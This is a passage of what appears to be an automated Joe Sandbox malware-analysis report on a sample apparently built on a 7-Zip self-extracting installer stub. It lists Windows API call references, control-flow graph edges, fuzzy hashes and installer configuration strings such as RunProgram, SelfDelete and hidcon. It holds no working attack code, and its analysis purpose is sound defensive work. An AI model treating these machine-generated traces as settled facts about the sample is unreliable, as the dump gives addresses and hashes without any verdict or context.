                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                                              • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                              • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                              • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                              • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                              • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                                            • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                                            • _wtol.MSVCRT ref: 00405F65
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                                            • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                                                                            • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                                            • API String ID: 154539431-3058303289
                                                                                            • Opcode ID: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                                            • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                                            • Opcode Fuzzy Hash: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                                            • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D
                                                                                            Function 00401626 Relevance: 22.8, APIs: 15, Instructions: 304COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 700 4017a2-4017a8 695->700 701 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->701 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 700->704 705 4017aa-4017ad 700->705 701->660 709 4017dc-4017df 704->709 707 4017b6-4017c2 705->707 708 4017af-4017b1 705->708 707->709 708->693 710 4017e1-4017e3 call 403354 709->710 711 4017f8-4017ff call 40301a 709->711 714 4017e8-4017eb 710->714 715 401804-401809 711->715 714->697 716 4017f1-4017f3 714->716 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 746 4018d1-4018d9 739->746 747 4018db-4018f3 call 40db53 739->747 742 40188a-40189a ??3@YAXPAX@Z 740->742 744 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 742->744 745 40189c-40189e 742->745 744->660 745->744 746->742 753 4018f5-401904 GetLastError 747->753 754 401906-40190e ??3@YAXPAX@Z 747->754 753->742 754->729
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                                            • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                                            • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                                            • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58
                                                                                            Function 0040301A Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                                                            • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 1799206407-0
                                                                                            • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                            • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                                                            • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                                            • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                                                            Function 0040118A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                                                            • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: DiskFreeMessageSendSpace
                                                                                            • String ID:
                                                                                            • API String ID: 696007252-0
                                                                                            • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                                            • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                                                            • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                                            • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D
                                                                                            Function 00411DEF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                            • String ID: HpA
                                                                                            • API String ID: 801014965-2938899866
                                                                                            • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                            • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                                                            • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                                            • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58
                                                                                            Function 00401B37 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47timewindowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                                            • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                                            • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                                            • DispatchMessageW.USER32(?), ref: 00401B89
                                                                                            • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                                            • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                            • String ID: Static
                                                                                            • API String ID: 2479445380-2272013587
                                                                                            • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                            • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                                            • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                                            • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9
                                                                                            Function 0040B163 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                                                            • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@memcpymemmove
                                                                                            • String ID:
                                                                                            • API String ID: 3549172513-3916222277
                                                                                            • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                                            • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                                                            • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                                            • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D
                                                                                            Function 00403354 Relevance: 10.6, APIs: 7, Instructions: 145stringtimeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 851 4033f8-4033fa 838->851 852 403419-40341b 839->852 853 40340a-403417 call 407776 839->853 840->831 847 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->847 848 40347f-40348a 841->848 844->837 849 4033b6 844->849 864 4034bc-4034c0 847->864 848->847 854 40348c-403490 848->854 849->835 858 40349c-4034a5 ??3@YAXPAX@Z 851->858 855 40346b-403475 ??3@YAXPAX@Z 852->855 856 40341d-40343c memcpy 852->856 853->851 854->847 860 403492-403497 854->860 855->864 862 403451-403455 856->862 863 40343e 856->863 858->864 860->847 861 403499-40349b 860->861 861->858 867 403440-403448 862->867 868 403457-403464 call 401986 862->868 866 403450 863->866 866->862 867->868 869 40344a-40344e 867->869 868->853 872 403466-403469 868->872 869->866 869->868 872->855 872->856
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                                              • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                              • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                            • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
